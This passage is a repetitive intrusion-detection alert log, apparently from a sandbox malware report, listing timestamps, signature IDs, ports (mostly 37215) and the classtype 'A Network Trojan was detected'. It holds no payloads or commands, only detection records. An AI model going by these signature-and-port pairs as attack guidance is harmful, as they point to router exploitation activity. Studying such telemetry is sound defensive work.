                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011298
                  SID:2835222
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505389
                  SID:2835222
                  Source Port:37206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.031000
                  SID:2829579
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897837
                  SID:2829579
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268658
                  SID:2829579
                  Source Port:37910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.785439
                  SID:2835222
                  Source Port:33926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301370
                  SID:2829579
                  Source Port:42670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2835222
                  Source Port:47848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820800
                  SID:2829579
                  Source Port:37406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2835222
                  Source Port:34258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.654504
                  SID:2835222
                  Source Port:38758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978564
                  SID:2829579
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069901
                  SID:2835222
                  Source Port:34162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:58306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2829579
                  Source Port:47508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2829579
                  Source Port:52066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.875579
                  SID:2829579
                  Source Port:59512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.520165
                  SID:2835222
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.479752
                  SID:2829579
                  Source Port:57898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2835222
                  Source Port:38266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2835222
                  Source Port:39332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:39118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116364
                  SID:2829579
                  Source Port:53278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2835222
                  Source Port:36052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423394
                  SID:2829579
                  Source Port:51646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2829579
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2829579
                  Source Port:41646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.937517
                  SID:2829579
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.947643
                  SID:2835222
                  Source Port:48016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176573
                  SID:2829579
                  Source Port:46238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538525
                  SID:2829579
                  Source Port:57402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881754
                  SID:2829579
                  Source Port:48286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2835222
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903697
                  SID:2829579
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.417090
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2835222
                  Source Port:32820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223622
                  SID:2829579
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2829579
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286969
                  SID:2835222
                  Source Port:60110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115720
                  SID:2829579
                  Source Port:45616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933284
                  SID:2835222
                  Source Port:57606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.657783
                  SID:2829579
                  Source Port:42534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593829
                  SID:2829579
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2835222
                  Source Port:58422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671572
                  SID:2829579
                  Source Port:40174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.074781
                  SID:2030490
                  Source Port:33400
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256237
                  SID:2835222
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081710
                  SID:2829579
                  Source Port:42072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259502
                  SID:2835222
                  Source Port:36004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804457
                  SID:2829579
                  Source Port:45454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.163541
                  SID:2829579
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520266
                  SID:2835222
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223623
                  SID:2829579
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850354
                  SID:2829579
                  Source Port:41694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462338
                  SID:2829579
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065728
                  SID:2829579
                  Source Port:43984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2829579
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.537786
                  SID:2835222
                  Source Port:38632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2829579
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2829579
                  Source Port:43994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.960934
                  SID:2835222
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2829579
                  Source Port:44264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:32858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.844638
                  SID:2829579
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.754443
                  SID:2829579
                  Source Port:47438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2835222
                  Source Port:56216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.439242
                  SID:2835222
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.943279
                  SID:2835222
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.533066
                  SID:2835222
                  Source Port:37670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540186
                  SID:2829579
                  Source Port:48928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:35306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459051
                  SID:2835222
                  Source Port:51738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.642690
                  SID:2835222
                  Source Port:51738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716431
                  SID:2829579
                  Source Port:56306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.597188
                  SID:2030490
                  Source Port:48466
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.089807
                  SID:2829579
                  Source Port:34288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2835222
                  Source Port:45580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2835222
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.840323
                  SID:2835222
                  Source Port:40714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2835222
                  Source Port:51398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2835222
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078747
                  SID:2829579
                  Source Port:34122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.788473
                  SID:2829579
                  Source Port:58778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933470
                  SID:2835222
                  Source Port:43406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.672613
                  SID:2829579
                  Source Port:60004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.377315
                  SID:2835222
                  Source Port:49968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.661675
                  SID:2835222
                  Source Port:40298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380057
                  SID:2835222
                  Source Port:48756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2829579
                  Source Port:44056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2829579
                  Source Port:50590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454627
                  SID:2829579
                  Source Port:59188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470816
                  SID:2829579
                  Source Port:38422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2829579
                  Source Port:59578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.487738
                  SID:2829579
                  Source Port:54036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2835222
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605361
                  SID:2835222
                  Source Port:53060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.423540
                  SID:2835222
                  Source Port:37086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2829579
                  Source Port:58428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262601
                  SID:2835222
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.856770
                  SID:2829579
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2835222
                  Source Port:48538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2835222
                  Source Port:39644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.945867
                  SID:2835222
                  Source Port:58744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821259
                  SID:2835222
                  Source Port:37208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.317114
                  SID:2829579
                  Source Port:50358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2835222
                  Source Port:56514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2829579
                  Source Port:40952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.026177
                  SID:2829579
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2835222
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2835222
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.491395
                  SID:2835222
                  Source Port:42622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858486
                  SID:2829579
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164271
                  SID:2829579
                  Source Port:37510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.068125
                  SID:2835222
                  Source Port:60350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2835222
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929842
                  SID:2835222
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2829579
                  Source Port:48820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2835222
                  Source Port:58592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000596
                  SID:2835222
                  Source Port:45644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.307540
                  SID:2835222
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217432
                  SID:2829579
                  Source Port:49980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.853365
                  SID:2829579
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435588
                  SID:2835222
                  Source Port:38908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2829579
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2835222
                  Source Port:59840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:59198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2829579
                  Source Port:38384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060029
                  SID:2829579
                  Source Port:56960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460517
                  SID:2829579
                  Source Port:40830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041321
                  SID:2835222
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.689305
                  SID:2835222
                  Source Port:59390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.347593
                  SID:2829579
                  Source Port:60916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2835222
                  Source Port:38876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2829579
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.925290
                  SID:2835222
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.262800
                  SID:2835222
                  Source Port:38540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.037647
                  SID:2829579
                  Source Port:46748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.511212
                  SID:2829579
                  Source Port:60590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2835222
                  Source Port:55254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395459
                  SID:2835222
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:54348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2835222
                  Source Port:46334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917453
                  SID:2835222
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908233
                  SID:2835222
                  Source Port:54922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868553
                  SID:2829579
                  Source Port:60602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2829579
                  Source Port:48404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.587846
                  SID:2835222
                  Source Port:36236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878345
                  SID:2835222
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522434
                  SID:2829579
                  Source Port:51430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.621009
                  SID:2829579
                  Source Port:42774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856235
                  SID:2835222
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001524
                  SID:2829579
                  Source Port:58500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353927
                  SID:2829579
                  Source Port:48542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585781
                  SID:2835222
                  Source Port:58658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.883651
                  SID:2829579
                  Source Port:52488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2829579
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2829579
                  Source Port:60316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2835222
                  Source Port:42240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2829579
                  Source Port:52644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2829579
                  Source Port:56428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2829579
                  Source Port:34246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102101
                  SID:2829579
                  Source Port:45730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.186644
                  SID:2829579
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.586779
                  SID:2829579
                  Source Port:54694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303785
                  SID:2829579
                  Source Port:56014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.375967
                  SID:2829579
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.834558
                  SID:2829579
                  Source Port:39240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.977851
                  SID:2829579
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.571607
                  SID:2835222
                  Source Port:37926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.062116
                  SID:2829579
                  Source Port:52902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2829579
                  Source Port:40226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2829579
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.193569
                  SID:2835222
                  Source Port:50110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852238
                  SID:2835222
                  Source Port:58654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167933
                  SID:2835222
                  Source Port:57892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795487
                  SID:2835222
                  Source Port:38386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2835222
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2829579
                  Source Port:52694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.365607
                  SID:2829579
                  Source Port:58642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079394
                  SID:2835222
                  Source Port:36610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2829579
                  Source Port:35112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.561697
                  SID:2829579
                  Source Port:49664
